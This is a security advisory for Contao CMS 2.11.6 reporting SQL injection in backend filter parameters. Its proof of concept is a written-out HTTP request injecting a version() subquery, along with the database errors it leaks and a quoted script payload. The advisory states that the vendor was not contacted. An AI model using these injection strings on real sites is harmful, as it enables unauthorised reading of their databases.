_________________________________________________________________________ title: Contao 2.11.6 Multiple vulnerabilities vulnerable version: 2.11.6 impact: medium homepage: www.contao.org found: 23.10.2012 by: aulmn _________________________________________________________________________ Vendor description: Contao is an open source content management system (CMS) for people who want a professional internet presence that is easy to maintain. _________________________________________________________________________ Vulnerability overview/description: Because of wrong validation of filter.x parameter, there is possible of sql-leak. Vulnerability exists for logged-in users (not confirmed to pre-auth). _________________________________________________________________________ Proof of concept: 1) to get to know 'what-is-the-validation-here', just work with payload for filter.x parameter: Sample output will be like this: " Fatal error: Uncaught exception Exception with message Query error: Undeclared variable: XSS (SELECT * FROM tl_theme ORDER BY name LIMIT XSS Example$(function() {$('#users').each(function() {var select = $(this);var option=select.children('option').first();select.after(option.text());select.hide();});}); [lt]script[gt]alert('xss');[lt]/script[gt],30) thrown in /home/contao/contao-2.11.6/system/libraries/Database.php on line 686" 2) To make sql-leak here: Request to vulnerable Contao CMS should look like this: ---8<--- POST /contao/contao-2.11.6/contao/main.php?do=themes HTTP/1.1 Host: 192.168.64.106 FORM_SUBMIT=tl_filters&REQUEST_TOKEN=tokenhere&filter.x=9&filter.y=5&tl_limit=1+or+1+in+(select+version())&tl_field=author&tl_value=&tl_sort=name ---8<--- ...to see response like this: ---8<--- Fatal error: Uncaught exception Exception with message Query error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or 1 in (select version()),30' at line 1 (SELECT * FROM tl_theme ORDER BY name LIMIT 1 or 1 in (select version()),30) thrown in /home/contao/contao-2.11.6/system/libraries/Database.php on line 686 #0 /home/contao/contao-2.11.6/system/libraries/Database.php(633): Database_Statement->query() #1 /home/contao/contao-2.11.6/system/drivers/DC_Table.php(3831): Database_Statement->execute(Array) #2 /home/contao/contao-2.11.6/system/drivers/DC_Table.php(344): DC_Table->listView() #3 /home/contao/contao-2.11.6/system/modules/backend/Backend.php(287): DC_Table->showAll() #4 /home/contao/contao-2.11.6/contao/main.php(120): Backend->getBackendModule('themes') #5 /home/contao/contao-2.11.6/contao/main.php(230): Main->run() #6 {main} ---8<--- (or: Fatal error: Uncaught exception Exception with message Query error: Got error 'empty (sub)expression' from regexp (SELECT COUNT(*) AS total FROM tl_theme WHERE LOWER(CAST(author AS CHAR)) REGEXP LOWER('xxxlalala')) thrown in /home/contao/contao-2.11.6/system/libraries/Database.php on line 686 ...or: Fatal error: Uncaught exception Exception with message Too few arguments to build the query string thrown in /home/contao/contao-2.11.6/system/libraries/Database.php on line 717 ) So like You see we have a nice sql-leak here. (Try to comment out rest of the line in attack string;)) _________________________________________________________________________ Vulnerable / tested versions: 2.11.6 Vulnerable parameters seems to be: tl_limit filter.x tl_value tl_sort _________________________________________________________________________ The vulnerability is verified to exist in 2.11.6, which is the most recent version at the time of discovery. _________________________________________________________________________ Vendor contact timeline: Nope. _________________________________________________________________________ Solution: Think about it. _________________________________________________________________________ Advisory URL: Here. _________________________________________________________________________ Contact: areulikemenow@gmail.com aulmn.blogspot.com